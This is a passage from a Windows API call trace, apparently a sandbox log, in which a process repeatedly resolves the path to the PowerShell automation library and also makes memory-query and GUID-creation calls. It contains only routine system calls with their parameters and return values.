lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] VirtualQuery (in: lpAddress=0x2dd074, lpBuffer=0x2de074, dwLength=0x1c | out: lpBuffer=0x2de074*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.420] VirtualQuery (in: lpAddress=0x2dd0b0, lpBuffer=0x2de0b0, dwLength=0x1c | out: lpBuffer=0x2de0b0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.420] GetLastError () returned 0x0 [0145.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.420] GetLastError () returned 0x0 [0145.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.420] GetLastError () returned 0x0 [0145.420] VirtualQuery (in: lpAddress=0x2dd17c, lpBuffer=0x2de17c, dwLength=0x1c | out: lpBuffer=0x2de17c*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x129457cf, Data2=0xa916, Data3=0x4f3f, Data4=([0]=0x8a, [1]=0x7c, [2]=0x59, [3]=0x6f, [4]=0xe3, [5]=0xca, [6]=0x79, [7]=0x1b))) returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.421] GetLastError () returned 0x0 [0145.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x120c6089, Data2=0x676e, Data3=0x48c8, Data4=([0]=0x8f, [1]=0x4d, [2]=0x2a, [3]=0xb6, [4]=0xf9, [5]=0xc1, [6]=0x20, [7]=0x92))) returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.422] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xd526d62a, Data2=0xb462, Data3=0x485b, Data4=([0]=0xb2, [1]=0x71, [2]=0x33, [3]=0x84, [4]=0xcb, [5]=0x58, [6]=0x5d, [7]=0x59))) returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.423] GetLastError () returned 0x0 [0145.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5409fee9, Data2=0x50a, Data3=0x4787, Data4=([0]=0xae, [1]=0xe4, [2]=0x8a, [3]=0x26, [4]=0x9d, [5]=0xf4, [6]=0xac, [7]=0x4))) returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.424] GetLastError () returned 0x0 [0145.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xd9cc207a, Data2=0x3c56, Data3=0x42ed, Data4=([0]=0xa0, [1]=0x90, [2]=0xa7, [3]=0x31, [4]=0x9d, [5]=0xf9, [6]=0x28, [7]=0xee))) returned 0x0 [0145.425] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x8dd15b2e, Data2=0x9c3, Data3=0x4c6a, Data4=([0]=0xa0, [1]=0xe6, [2]=0x9f, [3]=0x19, [4]=0xfe, [5]=0x57, [6]=0x78, [7]=0x99))) returned 0x0 [0145.425] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x9165ee87, Data2=0x25eb, Data3=0x40b7, Data4=([0]=0x94, [1]=0xe3, [2]=0xd5, [3]=0x66, [4]=0x60, [5]=0x73, [6]=0x13, [7]=0xe))) returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.425] GetLastError () returned 0x0 [0145.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.426] GetLastError () returned 0x0 [0145.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.426] GetLastError () returned 0x0 [0145.426] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x81e9cb4, Data2=0x60dd, Data3=0x4594, Data4=([0]=0x9a, [1]=0x44, [2]=0x65, [3]=0x8c, [4]=0xd7, [5]=0xcd, [6]=0x2f, [7]=0x5f))) returned 0x0 [0145.426] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.426] GetLastError () returned 0x0 [0145.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.426] GetLastError () returned 0x0 [0145.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.426] GetLastError () returned 0x0 [0145.426] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.427] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.427] GetLastError () returned 0x0 [0145.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.427] GetLastError () returned 0x0 [0145.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.427] GetLastError () returned 0x0 [0145.427] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.427] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dd978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddb10, lpFilePart=0x0 | out: 